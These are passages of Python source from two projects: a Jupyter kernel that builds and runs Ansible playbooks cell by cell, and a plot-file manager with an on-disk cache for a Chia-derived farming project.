'payload': [], 'user_expressions': {}, 'traceback': str(e).splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def do_inventory(self, code): logger.info("inventory set to %s", code) with open(os.path.join(self.temp_dir, 'inventory'), 'w') as f: f.write("\n".join(code.splitlines()[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_ansible_cfg(self, code): self.ansible_cfg = str(code) # Test that the code for ansible.cfg is parsable. Do not write the file yet. try: config = configparser.SafeConfigParser() if self.ansible_cfg is not None: config.readfp(six.StringIO(self.ansible_cfg)) except configparser.ParsingError as e: return self.send_error(e, 0) logger.info("ansible.cfg set to %s", code) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_host_vars(self, code): code_lines = code.strip().splitlines(True) host = code_lines[0][len('#host_vars'):].strip() logger.debug("host %s", host) host_vars = os.path.join(self.temp_dir, 'project', 'host_vars') if not os.path.exists(host_vars): os.mkdir(host_vars) with open(os.path.join(host_vars, host), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_vars(self, code): code_lines = code.strip().splitlines(True) vars = code_lines[0][len('#vars'):].strip() logger.debug("vars %s", vars) with open(os.path.join(self.temp_dir, 'project', vars), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_template(self, code): code_lines = code.strip().splitlines(True) template = code_lines[0][len('#template'):].strip() logger.debug("template %s", template) with open(os.path.join(self.temp_dir, 'project', template), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_group_vars(self, code): code_lines = code.strip().splitlines(True) group = code_lines[0][len('#group_vars'):].strip() logger.debug("group %s", group) group_vars = os.path.join(self.temp_dir, 'project', 'group_vars') if not os.path.exists(group_vars): os.mkdir(group_vars) with open(os.path.join(group_vars, group), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_execute_play(self, code): if self.is_ansible_alive(): self.do_shutdown(False) self.start_helper() code_data = yaml.load(code, Loader=yaml.FullLoader) logger.debug('code_data %r', code_data) logger.debug('code_data type: %s', type(code_data)) self.current_play = code playbook = [] current_play = yaml.load(self.current_play, Loader=yaml.FullLoader) if current_play is None: current_play = {} playbook.append(current_play) tasks = current_play['tasks'] = current_play.get('tasks', []) current_play['roles'] = current_play.get('roles', []) for role in current_play['roles']: if "." 
in role: self.get_galaxy_role(role) current_play['roles'].insert(0, 'ansible_kernel_helpers') tasks.append({'pause_for_kernel': {'host': '127.0.0.1', 'port': self.helper.pause_socket_port, 'task_num': self.tasks_counter - 1}}) widget_vars_file = os.path.join(self.temp_dir, 'project', 'widget_vars.yml') with open(widget_vars_file, 'w') as f: f.write(yaml.dump({})) tasks.append({'include_vars': {'file': 'widget_vars.yml'}}) tasks.append( {'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter)}) logger.debug(yaml.safe_dump(playbook, default_flow_style=False)) if not os.path.exists(os.path.join(self.temp_dir, 'project')): os.mkdir(os.path.join(self.temp_dir, 'project')) self.playbook_file = (os.path.join(self.temp_dir, 'project', 'playbook.yml')) with open(self.playbook_file, 'w') as f: f.write(yaml.safe_dump(playbook, default_flow_style=False)) # Weird work around for streaming content not showing stream_content = {'name': 'stdout', 'text': '\n'} self.send_response(self.iopub_socket, 'stream', stream_content) # End weird work around self.start_ansible_playbook() logger.info("done") return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def start_ansible_playbook(self): # We may need to purge artifacts when we start again if os.path.exists(os.path.join(self.temp_dir, 'artifacts')): shutil.rmtree(os.path.join(self.temp_dir, 'artifacts')) logger.info("runner starting") env = os.environ.copy() env['ANSIBLE_KERNEL_STATUS_PORT'] = str(self.helper.status_socket_port) self.runner_thread, self.runner = ansible_runner.run_async(private_data_dir=self.temp_dir, playbook="playbook.yml", quiet=True, debug=True, ignore_logging=True, cancel_callback=self.cancel_callback, finished_callback=self.finished_callback, event_handler=self.runner_process_message) logger.info("runner started") logger.info("Runner status: {}".format(self.runner.status)) while self.runner.status in ['unstarted', 'running', 'starting']: logger.info("In runner loop") try: logger.info("getting message %s", self.helper.pause_socket_port) msg = self.queue.get(timeout=1) except queue.Empty: logger.info("Queue Empty!") continue logger.info(msg) if isinstance(msg, StatusMessage): if self.process_message(msg.message): break elif isinstance(msg, TaskCompletionMessage): logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter) break elif not self.is_ansible_alive(): logger.info("ansible is dead") self.do_shutdown(False) break logger.info("Bottom of runner loop") time.sleep(1) logger.info("Runner state is now {}".format(self.runner.status)) self.clean_up_task_files() logger.info("done") def process_widgets(self): # Extract values from widgets # Values in widgets with a var_name property are added to the vars file # Values in widgets with a ansible_kernel_property are store into special variables widget_vars_file = os.path.join(self.temp_dir, 'project', 'widget_vars.yml') logger.debug("widget_vars_file %s", widget_vars_file) widget_vars = {} for widget in sorted(self.widgets.values(), key=lambda x: x['widget_update_order']): logger.debug("widget %s", pformat(widget)) if 'var_name' in widget and 'value' in widget: widget_vars[widget['var_name']] = widget['value'] if 'ansible_kernel_property' in widget and 'value' in widget: if widget['ansible_kernel_property'] == 'vault_password': self.vault_password = widget['value'] logger.debug("set vault_password") # Save the vars from the widgets and include it for this task with open(widget_vars_file, 'w') as f: 
f.write(yaml.safe_dump(widget_vars, default_flow_style=False)) def do_execute_task(self, code): if not self.is_ansible_alive(): logger.info("ansible is dead") self.do_shutdown(False) if self.helper is None: output = "No play found. Run a valid play cell" stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} self.registered_variable = None self.current_task = code try: code_data = yaml.load(code, Loader=yaml.FullLoader) except Exception: code_data = code logger.debug('code_data %s', code_data) logger.debug('code_data type: %s', type(code_data)) if isinstance(code_data, str): if (code_data.endswith("?")): module = code_data[:-1].split()[-1] else: module = code_data.split()[-1] data = self.get_module_doc(module) payload = dict( source='', data=data) logging.debug('payload %s', payload) # content = {'name': 'stdout', 'text': str(payload)} self.send_response(self.iopub_socket, 'display_data', payload) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} elif isinstance(code_data, list): code_data = code_data[0] elif isinstance(code_data, dict): code_data = code_data elif code_data is None: return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} else: logger.error('code_data %s unsupported type', type(code_data)) if not isinstance(code_data, dict): try: code_data = yaml.load(code, Loader=yaml.FullLoader) tb = [] except Exception: tb = traceback.format_exc(1).splitlines() reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': ['Invalid task cell\n'] + tb, 'ename': 'Invalid cell', 'evalue': ''} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply if 'include_role' in code_data.keys(): role_name = code_data['include_role'].get('name', '') if '.' 
in role_name: self.get_galaxy_role(role_name) if 'register' in code_data.keys(): self.registered_variable = code_data['register'] interrupted = False try: tasks = [] current_task_data = yaml.load(self.current_task, Loader=yaml.FullLoader) current_task_data['ignore_errors'] = True tasks.append(current_task_data) tasks.append({'pause_for_kernel': {'host': '127.0.0.1', 'port': self.helper.pause_socket_port, 'task_num': self.tasks_counter}}) self.process_widgets() tasks.append({'include_vars': {'file': 'widget_vars.yml'}}) # Create the include file task to look for the future task tasks.append( {'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter + 1)}) logger.debug(yaml.safe_dump(tasks, default_flow_style=False)) self.next_task_file = os.path.join(self.temp_dir, 'project', 'next_task{0}.yml'.format(self.tasks_counter)) self.tasks_counter += 1 self.task_files.append(self.next_task_file) with open(self.next_task_file, 'w') as f: f.write(yaml.safe_dump(tasks, default_flow_style=False)) logger.info('Wrote %s', self.next_task_file) self.helper.pause_socket.send_string('Proceed') while True: logger.info("getting message %s", self.helper.pause_socket_port) msg = self.queue.get() logger.info(msg) if isinstance(msg, StatusMessage): if self.process_message(msg.message): break elif isinstance(msg, TaskCompletionMessage): logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter) break except KeyboardInterrupt: logger.error(traceback.format_exc()) if interrupted: return {'status': 'abort', 'execution_count': self.execution_count} return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_execute_python(self, code): code = "".join(code.splitlines(True)[1:]) reply_content = {} res = self.shell.run_cell(code) logger.debug('do_execute_python res %s', pformat(res)) if res.success: reply_content['status'] = 'ok' else: reply_content['status'] = 'error' reply_content['execution_count'] = self.execution_count reply_content['payload'] = self.shell.payload_manager.read_payload() self.shell.payload_manager.clear_payload() self.export_python_variables() return reply_content def export_python_variables(self): try: self.silent = True original_display_trap = self.shell.display_trap self.shell.display_trap = NullDisplayTrap line1 = "import types" line2 = "import json" line3 = "json.dumps([_x for _x, _v in globals().items() if " \ "not _x.startswith('_') and " \ "_x not in ['In', 'Out', 'quit', 'pprint', 'exit', 'get_ipython'] and " \ "not isinstance(_v, types.ModuleType)])" for line in [line1, line2, line3]: res = self.shell.run_cell(line) logger.debug('export_python_variables res %s', pformat(res)) logger.debug('export_python_variables NullDisplay %s', pformat(NullDisplay.exec_result)) variable_values = dict() if res.success and NullDisplay.exec_result: logger.debug('export_python_variables %s', pformat(json.loads(NullDisplay.exec_result))) variable_names = json.loads(NullDisplay.exec_result) NullDisplay.exec_result = None for variable in variable_names: res = self.shell.run_cell('json.dumps({0})'.format(variable)) if res.success and NullDisplay.exec_result: variable_values[variable] = json.loads(NullDisplay.exec_result) NullDisplay.exec_result = None else: logger.debug('export_python_variables error') logger.debug('export_python_variables variable_values %s', pformat(variable_values)) self.do_execute_task(yaml.dump(dict(set_fact=variable_values))) finally: self.silent = False self.shell.display_trap = original_display_trap def 
do_execute_vault_password(self, code): self.shell.run_cell("import ansible_kernel.widgets\n" "style = {'description_width': 'initial'}\n" "ansible_kernel.widgets.VaultPassword(description='Vault Password:', style=style)\n") return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_complete(self, code, cursor_pos): code = code[:cursor_pos] default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} if code.strip().startswith("#inventory"): return default elif code.strip().startswith("#ansible.cfg"): return default elif code.strip().startswith("#host_vars"): return default elif code.strip().startswith("#group_vars"): return default elif code.strip().startswith("#task"): return self.do_complete_task(code, cursor_pos) elif code.strip().startswith("#play"): return self.do_complete_play(code, cursor_pos) else: return self.do_complete_task(code, cursor_pos) def do_complete_task(self, code, cursor_pos): default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} logger.debug('code %r', code) if not code or code[-1] == ' ': return default found_module = False code_data = None try: code_data = yaml.load(code, Loader=yaml.FullLoader) except Exception: try: code_data = yaml.load(code + ":", Loader=yaml.FullLoader) except Exception: code_data = None if code_data is not None: logger.debug('code_data %s', code_data) if isinstance(code_data, list) and len(code_data) > 0: code_data = code_data[0] if isinstance(code_data, dict): for key in code_data.keys(): if key in modules: module_name = key found_module = True break logger.debug('found_module %s', found_module) tokens = code.split() if not tokens: return default matches = [] token = tokens[-1] start = cursor_pos - len(token) logger.debug('token %s', token) if not found_module: for module in TASK_ARGS_MODULES: if module.startswith(token): matches.append(module) else: for arg in module_args.get(module_name, []) + task_args: if arg.startswith(token): matches.append(arg) if not matches: return default matches = [m for m in matches if m.startswith(token)] return {'matches': sorted(matches), 'cursor_start': start, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} def do_complete_play(self, code, cursor_pos): default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} logger.debug('code %r', code) if not code or code[-1] == ' ': return default tokens = code.split() if not tokens: return default matches = [] token = tokens[-1] start = cursor_pos - len(token) logger.debug('token %s', token) for arg in play_args: if arg.startswith(token): matches.append(arg) if not matches: return default matches = [m for m in matches if m.startswith(token)] return {'matches': sorted(matches), 'cursor_start': start, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} def do_inspect(self, code, cursor_pos, detail_level=0): logger.debug("code %s", code) logger.debug("cursor_pos %s", cursor_pos) logger.debug("detail_level %s", detail_level) if code.strip().startswith("#inventory"): logger.info("#inentory not supported") return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True} elif code.strip().startswith("#task"): return self.do_inspect_module(code, cursor_pos, detail_level) elif code.strip().startswith("#play"): logger.info("#play not supported") return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True} else: return self.do_inspect_module(code, 
cursor_pos, detail_level) def do_inspect_module(self, code, cursor_pos, detail_level=0): data = dict() code_data = yaml.load(code, Loader=yaml.FullLoader) logger.debug("code_data %s", code_data) if isinstance(code_data, str): module = code_data elif isinstance(code_data, dict): for arg in task_args: if arg in code_data: del code_data[arg] module = code_data.keys()[0] else: logger.warn('code type not supported %s', type(code_data)) return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': False} data.update(self.get_module_doc(module)) return {'status': 'ok', 'data': data, 'metadata': {}, 'found': True} def get_galaxy_role(self, role_name): command = ['ansible-galaxy', 'list', '-p', 'project/roles'] logger.debug("command %s", command) p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') for line in output.splitlines(): if line.startswith('- '): role, _, version = line[2:].partition(',') role = role.strip() if role == role_name: return p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT, ) command = ['ansible-galaxy', 'install', '-p', 'project/roles', role_name] logger.debug("command %s", command) p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT, ) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') logger.debug('output %s', output) stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) def get_module_doc(self, module): data = {} logger.debug("command %s", " ".join( ['ansible-doc', '-t', 'module', module])) p = Popen(['ansible-doc', '-t', 'module', module], stdout=PIPE, stderr=STDOUT, ) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') logger.debug('output %s', output) data['text/plain'] = output return data def is_ansible_alive(self): if self.runner_thread is None: logger.info("NOT STARTED") return False if self.runner_thread.is_alive(): logger.info("YES") else: logger.info("NO") return self.runner_thread.is_alive() def cancel_callback(self): logger.info('called') return self.shutdown_requested def finished_callback(self, runner): logger.info('called') self.shutdown = True if not self.shutdown_requested: self.queue.put(StatusMessage(['PlaybookEnded', {}])) def do_shutdown(self, restart): if self.is_ansible_alive(): self.shutdown = False self.shutdown_requested = True while not self.shutdown: if not self.is_ansible_alive(): break logger.info("waiting for shutdown") time.sleep(1) logger.info("shutdown complete") self.shutdown_requested = False self.runner_thread = None self.runner = None if self.helper is not None: self.helper.stop() self.helper = None return {'status': 'ok', 'restart': restart} def _format_application_python(self, result): if 'application/x-python' in result: ret_value = result['application/x-python'] del result['application/x-python'] return ret_value return "" def _format_text_html(self, result): if 'text/html' in result: ret_value = result['text/html'] del result['text/html'] return ret_value return "" def _format_output(self, result): if 'stdout_lines' in result: return '\n'.join(result['stdout_lines']) return "" def _format_error(self, result): if 'stderr_lines' in result: return '\n'.join(result['stderr_lines']) return "" def _dump_results(self, result): r = result for key in ['_ansible_verbose_always', '_ansible_no_log', 
'_ansible_parsed', 'invocation']: if key in r: del r[key] if 'stdout' in r: if r['stdout']: r['stdout'] = '[see below]' if 'stdout_lines' in r: if r['stdout_lines']: r['stdout_lines'] = '[removed for clarity]' if 'stderr' in r: if r['stderr']: r['stderr'] = '[see below]' if 'stderr_lines' in r: if r['stderr_lines']: r['stderr_lines'] = '[removed for clarity]' if 'changed' in r: del r['changed'] if 'reason' in r: return r['reason'] return json.dumps(r, sort_keys=True, indent=4) def set_parent(self, ident, parent, channel): super(AnsibleKernel, self).set_parent(ident, parent) self.shell.set_parent(parent) def send_multipart(self, msg, *args, **kwargs): logger.debug('send_multipart %s %s %s %s', len(msg), msg, args, kwargs) if len(msg) == 7: msg0, msg1, msg2, msg3, msg4, msg5, msg6 = msg logger.debug("msg0 %s", msg0) logger.debug("msg1 %s", msg1) logger.debug("msg2 %s", msg2) logger.debug("msg3 %s", pformat(json.loads(msg3))) logger.debug("msg4 %s", pformat(json.loads(msg4))) logger.debug("msg5 %s", pformat(json.loads(msg5))) logger.debug("msg6 %s", pformat(json.loads(msg6))) msg3_data = json.loads(msg3) msg6_data = json.loads(msg6) if msg0.startswith(b"comm"): _, _, comm_id = msg0.partition('-') if msg3_data['msg_type'] == 'comm_open' and msg6_data['comm_id'] == comm_id: self.update_widget(comm_id, msg6_data.get('data', {}).get('state', {})) logger.debug("new widget %s %s", comm_id, pformat(self.widgets[comm_id])) if msg3_data['msg_type'] == 'comm_msg' and msg6_data['comm_id'] == comm_id: if msg6_data.get('data', {}).get('method') == 'update': self.update_widget(comm_id, msg6_data.get('data', {}).get('state', {})) logger.debug("update widget %s %s", comm_id, pformat(self.widgets[comm_id])) def update_widget(self, comm_id, state): self.widgets[comm_id].update(state) self.widgets[comm_id]['widget_update_order'] = self.widget_update_order self.widget_update_order += 1 def comm_open(self, stream, ident, msg): logger.debug("comm_open: %s %s", ident, msg) self.comm_manager.comm_open(stream, ident, msg) def comm_msg(self, stream, ident, msg): logger.debug("comm_msg: %s %s", ident, msg) logger.debug("msg %s", pformat(msg)) comm_id = msg.get('content', {}).get('comm_id', {}) if comm_id in self.widgets: self.widgets[comm_id].update(msg.get('content', {}).get('data', {}).get('state', {})) logger.debug("updated widget %s %s", comm_id, self.widgets[comm_id]) self.comm_manager.comm_msg(stream, ident, msg) def comm_close(self, stream, ident, msg): logger.debug("comm_close: %s %s", ident, msg) self.comm_manager.comm_close(stream, ident, msg)
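# Illustrative notebook session, not taken from the source (the debug task
# below is a made-up example): do_execute dispatches on the first line of each
# cell, so a typical session writes an inventory, then a play, then tasks.
#
#   #inventory            -> saved as the runner's inventory file
#   [all]
#   localhost ansible_connection=local
#
#   #play                 -> becomes project/playbook.yml
#   name: default
#   hosts: localhost
#   gather_facts: false
#
#   #task                 -> written as next_task<N>.yml and executed
#   debug:
#     msg: hello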
manager.py
from dataclasses import dataclass import logging import threading import time import traceback from pathlib import Path from typing import Any, Callable, Dict, List, Optional, Set, Tuple, Iterator from concurrent.futures.thread import ThreadPoolExecutor from blspy import G1Element from chiapos import DiskProver from taco.consensus.pos_quality import UI_ACTUAL_SPACE_CONSTANT_FACTOR, _expected_plot_size from taco.plotting.util import ( PlotInfo, PlotRefreshResult, PlotsRefreshParameter, PlotRefreshEvents, get_plot_filenames, parse_plot_info, stream_plot_info_pk, stream_plot_info_ph, ) from taco.util.ints import uint16 from taco.util.path import mkdir from taco.util.streamable import Streamable, streamable from taco.types.blockchain_format.proof_of_space import ProofOfSpace from taco.types.blockchain_format.sized_bytes import bytes32 from taco.wallet.derive_keys import master_sk_to_local_sk log = logging.getLogger(__name__) CURRENT_VERSION: uint16 = uint16(0) @dataclass(frozen=True) @streamable class CacheEntry(Streamable): pool_public_key: Optional[G1Element] pool_contract_puzzle_hash: Optional[bytes32] plot_public_key: G1Element @dataclass(frozen=True) @streamable class DiskCache(Streamable): version: uint16 data: List[Tuple[bytes32, CacheEntry]] class Cache: _changed: bool _data: Dict[bytes32, CacheEntry] def __init__(self, path: Path): self._changed = False self._data = {} self._path = path if not path.parent.exists(): mkdir(path.parent) def __len__(self): return len(self._data) def update(self, plot_id: bytes32, entry: CacheEntry): self._data[plot_id] = entry self._changed = True def remove(self, cache_keys: List[bytes32]): for key in cache_keys: if key in self._data: del self._data[key] self._changed = True def save(self): try: disk_cache: DiskCache = DiskCache( CURRENT_VERSION, [(plot_id, cache_entry) for plot_id, cache_entry in self.items()] ) serialized: bytes = bytes(disk_cache) self._path.write_bytes(serialized) self._changed = False log.info(f"Saved {len(serialized)} bytes of cached data") except Exception as e: log.error(f"Failed to save cache: {e}, {traceback.format_exc()}") def load(self): try: serialized = self._path.read_bytes() log.info(f"Loaded {len(serialized)} bytes of cached data") stored_cache: DiskCache = DiskCache.from_bytes(serialized) if stored_cache.version != CURRENT_VERSION: # TODO, Migrate or drop current cache if the version changes. raise ValueError(f"Invalid cache version {stored_cache.version}. 
Expected version {CURRENT_VERSION}.") self._data = {plot_id: cache_entry for plot_id, cache_entry in stored_cache.data} except FileNotFoundError: log.debug(f"Cache {self._path} not found") except Exception as e: log.error(f"Failed to load cache: {e}, {traceback.format_exc()}") def keys(self): return self._data.keys() def items(self): return self._data.items() def get(self, plot_id): return self._data.get(plot_id) def changed(self): return self._changed def path(self): return self._path class PlotManager: plots: Dict[Path, PlotInfo] plot_filename_paths: Dict[str, Tuple[str, Set[str]]] plot_filename_paths_lock: threading.Lock failed_to_open_filenames: Dict[Path, int] no_key_filenames: Set[Path] farmer_public_keys: List[G1Element] pool_public_keys: List[G1Element] cache: Cache match_str: Optional[str] show_memo: bool open_no_key_filenames: bool last_refresh_time: float refresh_parameter: PlotsRefreshParameter log: Any _lock: threading.Lock _refresh_thread: Optional[threading.Thread] _refreshing_enabled: bool _refresh_callback: Callable def __init__( self, root_path: Path, refresh_callback: Callable, match_str: Optional[str] = None, show_memo: bool = False, open_no_key_filenames: bool = False, refresh_parameter: PlotsRefreshParameter = PlotsRefreshParameter(), ): self.root_path = root_path self.plots = {} self.plot_filename_paths = {} self.plot_filename_paths_lock = threading.Lock() self.failed_to_open_filenames = {} self.no_key_filenames = set() self.farmer_public_keys = [] self.pool_public_keys = [] self.cache = Cache(self.root_path.resolve() / "cache" / "plot_manager.dat") self.match_str = match_str self.show_memo = show_memo self.open_no_key_filenames = open_no_key_filenames self.last_refresh_time = 0 self.refresh_parameter = refresh_parameter self.log = logging.getLogger(__name__) self._lock = threading.Lock() self._refresh_thread = None self._refreshing_enabled = False self._refresh_callback = refresh_callback # type: ignore def __enter__(self): self._lock.acquire() def __exit__(self, exc_type, exc_value, exc_traceback): self._lock.release() def set_refresh_callback(self, callback: Callable): self._refresh_callback = callback # type: ignore def set_public_keys(self, farmer_public_keys: List[G1Element], pool_public_keys: List[G1Element]): self.farmer_public_keys = farmer_public_keys self.pool_public_keys = pool_public_keys def public_keys_available(self): return len(self.farmer_public_keys) and len(self.pool_public_keys) def plot_count(self): with self: return len(self.plots) def get_duplicates(self): result = [] for plot_filename, paths_entry in self.plot_filename_paths.items(): _, duplicated_paths = paths_entry for path in duplicated_paths: result.append(Path(path) / plot_filename) return result def needs_refresh(self) -> bool: return time.time() - self.last_refresh_time > float(self.refresh_parameter.interval_seconds) def start_refreshing(self): self._refreshing_enabled = True if self._refresh_thread is None or not self._refresh_thread.is_alive(): self.cache.load() self._refresh_thread = threading.Thread(target=self._refresh_task) self._refresh_thread.start() def stop_refreshing(self): self._refreshing_enabled = False if self._refresh_thread is not None and self._refresh_thread.is_alive(): self._refresh_thread.join() self._refresh_thread = None def trigger_refresh(self): log.debug("trigger_refresh") self.last_refresh_time = 0 def _refresh_task(self): while self._refreshing_enabled: while not self.needs_refresh() and self._refreshing_enabled: time.sleep(1) if not 
self._refreshing_enabled: return plot_filenames: Dict[Path, List[Path]] = get_plot_filenames(self.root_path) plot_directories: Set[Path] = set(plot_filenames.keys()) plot_paths: List[Path] = [] for paths in plot_filenames.values(): plot_paths += paths total_result: PlotRefreshResult = PlotRefreshResult() total_size = len(plot_paths) self._refresh_callback(PlotRefreshEvents.started, PlotRefreshResult(remaining=total_size)) # First drop all plots we have in plot_filename_paths but not longer in the filesystem or set in config def plot_removed(test_path: Path): return not test_path.exists() or test_path.parent not in plot_directories filenames_to_remove: List[str] = [] for plot_filename, paths_entry in self.plot_filename_paths.items(): loaded_path, duplicated_paths = paths_entry loaded_plot = Path(loaded_path) / Path(plot_filename) if plot_removed(loaded_plot): filenames_to_remove.append(plot_filename) if loaded_plot in self.plots: del self.plots[loaded_plot] total_result.removed += 1 # No need to check the duplicates here since we drop the whole entry continue paths_to_remove: List[str] = [] for path in duplicated_paths: if plot_removed(Path(path) / Path(plot_filename)): paths_to_remove.append(path) total_result.removed += 1 for path in paths_to_remove: duplicated_paths.remove(path) for filename in filenames_to_remove: del self.plot_filename_paths[filename] def batches() -> Iterator[Tuple[int, List[Path]]]: if total_size > 0: for batch_start in range(0, total_size, self.refresh_parameter.batch_size): batch_end = min(batch_start + self.refresh_parameter.batch_size, total_size) yield total_size - batch_end, plot_paths[batch_start:batch_end] else: yield 0, [] for remaining, batch in batches(): batch_result: PlotRefreshResult = self.refresh_batch(batch, plot_directories) if not self._refreshing_enabled: self.log.debug("refresh_plots: Aborted") break # Set the remaining files since `refresh_batch()` doesn't know them but we want to report it batch_result.remaining = remaining total_result.loaded += batch_result.loaded total_result.processed += batch_result.processed total_result.duration += batch_result.duration self._refresh_callback(PlotRefreshEvents.batch_processed, batch_result) if remaining == 0: break batch_sleep = self.refresh_parameter.batch_sleep_milliseconds self.log.debug(f"refresh_plots: Sleep {batch_sleep} milliseconds") time.sleep(float(batch_sleep) / 1000.0) if self._refreshing_enabled: self._refresh_callback(PlotRefreshEvents.done, total_result) # Cleanup unused cache available_ids = set([plot_info.prover.get_id() for plot_info in self.plots.values()]) invalid_cache_keys = [plot_id for plot_id in self.cache.keys() if plot_id not in available_ids] self.cache.remove(invalid_cache_keys) self.log.debug(f"_refresh_task: cached entries removed: {len(invalid_cache_keys)}") if self.cache.changed(): self.cache.save() self.last_refresh_time = time.time() self.log.debug( f"_refresh_task: total_result.loaded {total_result.loaded}, " f"total_result.removed {total_result.removed}, " f"total_duration {total_result.duration:.2f} seconds" ) def refresh_batch(self, plot_paths: List[Path], plot_directories: Set[Path]) -> PlotRefreshResult: start_time: float = time.time() result: PlotRefreshResult = PlotRefreshResult(processed=len(plot_paths)) counter_lock = threading.Lock() log.debug(f"refresh_batch: {len(plot_paths)} files in directories {plot_directories}") if self.match_str is not None: log.info(f'Only loading plots that contain "{self.match_str}" in the file or directory name') def 
process_file(file_path: Path) -> Optional[PlotInfo]: if not self._refreshing_enabled: return None filename_str = str(file_path) if self.match_str is not None and self.match_str not in filename_str: return None if ( file_path in self.failed_to_open_filenames and (time.time() - self.failed_to_open_filenames[file_path]) < self.refresh_parameter.retry_invalid_seconds ): # Try once every `refresh_parameter.retry_invalid_seconds` seconds to open the file return None if file_path in self.plots: return self.plots[file_path] entry: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name) if entry is not None: loaded_parent, duplicates = entry if str(file_path.parent) in duplicates: log.debug(f"Skip duplicated plot {str(file_path)}") return None try: if not file_path.exists(): return None prover = DiskProver(str(file_path)) log.debug(f"process_file {str(file_path)}") expected_size = _expected_plot_size(prover.get_size()) * UI_ACTUAL_SPACE_CONSTANT_FACTOR stat_info = file_path.stat() # TODO: consider checking if the file was just written to (which would mean that the file is still # being copied). A segfault might happen in this edge case. if prover.get_size() >= 30 and stat_info.st_size < 0.98 * expected_size: log.warning( f"Not farming plot {file_path}. Size is {stat_info.st_size / (1024**3)} GiB, but expected" f" at least: {expected_size / (1024 ** 3)} GiB. We assume the file is being copied." ) return None cache_entry = self.cache.get(prover.get_id()) if cache_entry is None: ( pool_public_key_or_puzzle_hash, farmer_public_key, local_master_sk, ) = parse_plot_info(prover.get_memo()) # Only use plots that correct keys associated with them if farmer_public_key not in self.farmer_public_keys: log.warning(f"Plot {file_path} has a farmer public key that is not in the farmer's pk list.") self.no_key_filenames.add(file_path) if not self.open_no_key_filenames: return None pool_public_key: Optional[G1Element] = None pool_contract_puzzle_hash: Optional[bytes32] = None if isinstance(pool_public_key_or_puzzle_hash, G1Element): pool_public_key = pool_public_key_or_puzzle_hash else: assert isinstance(pool_public_key_or_puzzle_hash, bytes32) pool_contract_puzzle_hash = pool_public_key_or_puzzle_hash if pool_public_key is not None and pool_public_key not in self.pool_public_keys: log.warning(f"Plot {file_path} has a pool public key that is not in the farmer's pool pk list.") self.no_key_filenames.add(file_path) if not self.open_no_key_filenames: return None local_sk = master_sk_to_local_sk(local_master_sk) plot_public_key: G1Element = ProofOfSpace.generate_plot_public_key( local_sk.get_g1(), farmer_public_key, pool_contract_puzzle_hash is not None ) cache_entry = CacheEntry(pool_public_key, pool_contract_puzzle_hash, plot_public_key) self.cache.update(prover.get_id(), cache_entry) with self.plot_filename_paths_lock: paths: Optional[Tuple[str, Set[str]]] = self.plot_filename_paths.get(file_path.name) if paths is None: paths = (str(Path(prover.get_filename()).parent), set()) self.plot_filename_paths[file_path.name] = paths else: paths[1].add(str(Path(prover.get_filename()).parent)) log.warning(f"Have multiple copies of the plot {file_path.name} in {[paths[0], *paths[1]]}.") return None new_plot_info: PlotInfo = PlotInfo( prover, cache_entry.pool_public_key, cache_entry.pool_contract_puzzle_hash, cache_entry.plot_public_key, stat_info.st_size, stat_info.st_mtime, ) with counter_lock: result.loaded += 1 if file_path in self.failed_to_open_filenames: del self.failed_to_open_filenames[file_path] 
